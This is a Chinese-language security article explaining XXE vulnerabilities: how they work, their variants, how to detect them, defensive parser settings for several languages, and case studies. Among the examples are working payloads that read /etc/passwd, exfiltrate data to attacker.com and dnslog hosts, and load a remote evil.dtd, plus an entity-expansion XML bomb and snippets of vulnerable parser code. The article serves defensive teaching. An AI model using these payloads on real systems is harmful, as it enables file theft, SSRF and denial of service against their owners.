引言

XML External Entity (XXE) 是一种严重的输入解析漏洞，攻击者利用XML解析器处理外部实体时的弱配置，实现本地文件读取、服务器端请求伪造（SSRF）、拒绝服务或敏感信息泄露。本文将从原理、利用流程、漏洞变体、检测与防御等多维度展开，提供深度技术分析与实用防护建议。

XXE漏洞到底是什么？

定义

XXE指的是XML文档在解析过程中，加载并解析了外部实体（External Entity）或DTD中的参数实体。这类实体可以引用本地文件、远程资源乃至系统命令，导致敏感数据泄露、内网访问或服务中断。

关键依赖

XML处理器支持DTD（Document Type Definition）
外部实体解析功能开启
应用程序接收并解析用户可控的XML输入

若应用仅处理简单XML且禁用外部实体，则不会受XXE影响。

XXE的发生条件

接受用户上传或传入XML内容
使用DOM、SAX、StAX等XML解析器
解析器未禁用外部实体
XML中包含DTD或entity声明

XXE原理解析

XML实体基本结构

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

在上例中，解析器遇到&xxe;时，会尝试加载file:///etc/passwd并将内容替换到XML中。

实体类型

内部实体：直接在DTD中定义字符串
外部实体：引用外部资源（file://、http://等）
参数实体：用于DTD内部定义，格式为%name;

攻击流程

攻击者构造恶意XML并发送给目标应用
服务器XML解析器加载DTD
解析器解析外部实体并读取或请求外部资源
响应中返回敏感数据或触发外部连接

XXE漏洞类型

1. 直接XXE

解析结果中直接返回实体内容。例如文件数据被嵌入响应。

2. 盲XXE

服务器不直接返回实体内容，但解析器仍会发起请求。攻击者借助DNS或HTTP回显渠道获取信息。

3. Out-of-Band XXE（OOB-XXE）

通过DNS或HTTP回调获得数据，常见于无法直接查看响应的场景。

4. SSRF/端口扫描型XXE

利用外部实体发起网络请求到内部地址，探测服务或访问云元数据。

XXE典型利用示例

直接读取本地文件

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

目标应用返回的响应可能包含/etc/passwd内容。

OOB数据泄露

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=secret">
]>
<foo>&xxe;</foo>

解析器会访问攻击者控制的URL，攻击者通过服务器日志或HTTP请求记录敏感数据。

盲XXE基于DNS

1 2	<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote;

恶意DTD可以向攻击者控制的域发起DNS查询，泄露主机名、文件名等信息。

常见触发场景

SOAP Web Services
REST API中接收XML
XML配置文件上传
SAML断言、RSS/Atom解析
Office文档解析、SVG图像处理

XXE相关的安全影响

本地文件读取：/etc/passwd、私钥文件、配置文件
服务器端请求伪造（SSRF）：访问内网、元数据服务
恶意外部连接：泄露数据到攻击者服务器
拒绝服务：解析大实体或循环引用耗尽资源
远程代码执行：在特定解析器或应用逻辑下可能链成RCE

常见漏洞触发代码

Java DOM解析

1
2
3

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(new ByteArrayInputStream(xmlBytes));

如果未禁用外部实体，该代码是XXE易受攻击的。

PHP SimpleXML

1	$xml = simplexml_load_string($userInput);

默认情况下，SimpleXML会解析外部实体。

Python lxml

1 2	from lxml import etree root = etree.fromstring(user_input)

需要显式禁用DTD和外部实体。

XXE检测方法

1. 手工构造Payload

本地文件：file:///etc/passwd
HTTP回调：http://attacker.com/xxe
DNS回调：http://attacker.dnslog.cn/xxe

2. 模拟攻击工具

XXE-Proxy
xmltest
Burp Suite plus Collaborator
Nuclei、Acunetix

3. 代码审计

检查以下接口调用：

Java：DocumentBuilderFactory, SAXParserFactory, XMLInputFactory, TransformerFactory
PHP：simplexml_load_string, DOMDocument::loadXML, xml_parse, libxml_disable_entity_loader
Python：lxml, xml.etree.ElementTree, defusedxml
.NET：XmlReader, XmlDocument

4. 配置审计

确认解析器是否禁用了DTD、外部实体和外部参数实体。

XXE防御策略

核心原则：禁止外部实体和DTD

最有效的防御方式是在解析器层面关闭DTD和外部实体处理。

Java推荐配置

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

PHP防御配置

1 2	libxml_disable_entity_loader(true); $xml = simplexml_load_string($userInput, 'SimpleXMLElement', LIBXML_NONET);

Python防御配置

1 2	from defusedxml import ElementTree as ET root = ET.fromstring(user_input)

或使用lxml禁用DTD：

1 2	parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True) root = etree.fromstring(user_input, parser)

.NET防御配置

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using (XmlReader reader = XmlReader.Create(stream, settings)) {
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}

其他语言与库

Ruby：Nokogiri::XML::ParseOptions::NOENT
Node.js：避免使用xml2js中的外部实体解析功能
Go：encoding/xml默认不支持外部实体，但需警惕第三方库

最小化处理原则

仅解析必要的XML字段
避免解析复杂的DTD
使用白名单验证根元素和命名空间
避免直接使用用户上传的XML作为配置文件

进阶防御

内容安全与网络隔离

在应用层禁用外部网络访问
将解析操作放在隔离容器中
使用WAF检测外部实体模式

安全日志与告警

记录解析失败与DTD声明事件
检测请求中出现<!DOCTYPE或SYSTEM关键词
配置报警规则识别OOB回调

代码审计与测试

将XXE测试纳入CI/CD安全扫描
使用Unit Test验证XML处理配置
对不同XML解析器执行安全基线测试

XXE漏洞高级扩展

XML Schema与DTD关系

XXE依赖于DTD或外部实体声明。即使使用XML Schema进行验证，如果解析器仍允许DTD并解析实体，仍然可能出现XXE。

XML实体递归与拒绝服务

<!DOCTYPE bomb [
  <!ENTITY a "1234567890">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<foo>&c;</foo>

别瞎搞，这种“XML炸弹”会导致解析器内存和CPU爆炸。

XXE与SAML、SOAP和WSDL

SAML断言：攻击者可在SAML请求中嵌入外部实体
SOAP服务：SOAP XML通常含DTD或引用外部XSD
WSDL接口：外部Schema解析也可能引发XXE

XXE与SSRF联动

外部实体使用http://时，本质上是服务器向外部发起请求，属于SSRF范畴。攻击者可通过内网地址访问内网服务或云元数据服务。

典型案例

1. Apache Struts2 / Oracle WebLogic

漏洞背景

Apache Struts2和Oracle WebLogic曾出现多个XXE相关漏洞，尤其在处理SOAP请求或XML配置时未禁用外部实体解析。

攻击链

攻击者向受影响应用发送带有<!DOCTYPE ...>的恶意XML请求。
服务器解析XML时加载外部实体，读取本地敏感文件或访问内部服务。
如果解析结果返回给应用，攻击者即可获取文件内容；如果结合其它漏洞，还能链成远程代码执行。

影响与利用

读取服务器文件：/etc/passwd、/etc/hostname、私钥文件
泄露WebLogic凭证或配置
在Struts2中可触发后续OGNL表达式执行，造成RCE

修复要点

在解析SOAP/XML时禁用DTD和外部实体
升级到修复补丁版本
使用安全配置模板如xml-commons的安全Feature设置

2. Jenkins XML配置

漏洞背景

Jenkins使用XML存储构建配置、插件元数据和作业定义。如果插件或用户输入的XML未经过安全处理，XXE可被利用。

攻击链

攻击者提交恶意XML配置或参数给Jenkins接口。
Jenkins解析XML并请求外部实体，例如file:///etc/jenkins/secret.key。
解析器将实体内容解析后，敏感数据被写入日志或返回给应用层。

影响与利用

泄露Jenkins凭证、私钥、SSH密钥
读取credentials.xml、config.xml等敏感文件
工具链中断或插件执行失控

修复要点

更新Jenkins核心及插件到最新安全版本
常见防御：XmlSlurper/SAXBuilder禁用外部实体和DTD
对用户上传的XML文件进行白名单验证

3. XML实体回调日志泄露

漏洞背景

有些应用会把原始XML请求或解析错误写入日志。若攻击者构造OOB XXE，解析器会访问攻击者控制的域名并将回调信息记录在日志中。

攻击链

恶意XML包含外部实体指向攻击者的域名，例如http://attacker.dnslog.cn/xxe?file=/etc/passwd。
解析器解析实体并发起HTTP/DNS请求。
攻击者在日志平台或DNS服务上观察到回调，确认漏洞存在。

影响与利用

无需直接响应即可确认漏洞
可用于探测内网地址或元数据服务
结合日志注入可进一步扩展攻击面

修复要点

禁用外部实体解析
限制应用对外部网络的访问
监控异常DNS/HTTP出站请求

4. SAML断言与SSO场景

漏洞背景

SAML断言在单点登录（SSO）中广泛使用，含XML签名与验证。如果SAML处理组件解析恶意DTD，攻击者可在认证请求中植入XXE。

攻击链

攻击者构造恶意SAML请求，携带外部实体声明。
SAML库解析断言时加载外部实体。
漏洞可导致本地文件读取、SSRF或凭证泄露。

影响与利用

窃取身份验证凭证
访问内部IdP/SSO元数据
破坏登录流程或绕过授权

修复要点

使用安全的SAML库和配置
禁用SAML解析器中DTD/实体处理
对SAML请求源进行严格校验

5. 复杂应用中的“XML炸弹”案例

漏洞背景

一些应用仅关注实体解析，忽视了实体递归与扩展大小。攻击者可构造“Billion Laughs”或“XML炸弹”实现拒绝服务。

攻击链

构造嵌套实体，使解析时内容指数级膨胀。
解析器递归展开实体，占用大量内存和CPU。
应用崩溃或服务不可用。

影响与利用

DOS：内存耗尽、CPU飙升
解析器崩溃或挂起
业务中断，可能造成安全监控误报

修复要点

禁用实体解析
限制DTD大小和实体展开深度
使用解析器的安全模式或资源配额

总结

XXE是一个“解析器层面”的漏洞，风险不仅来自输入内容本身，也可能源于默认解析器配置。禁用DTD与实体解析、使用安全库、最小化XML解析范围，以及将XXE检测纳入开发生命周期，是防御该类漏洞的关键。对于高风险应用场景，应结合网络隔离、日志分析和代码审计形成多层防御。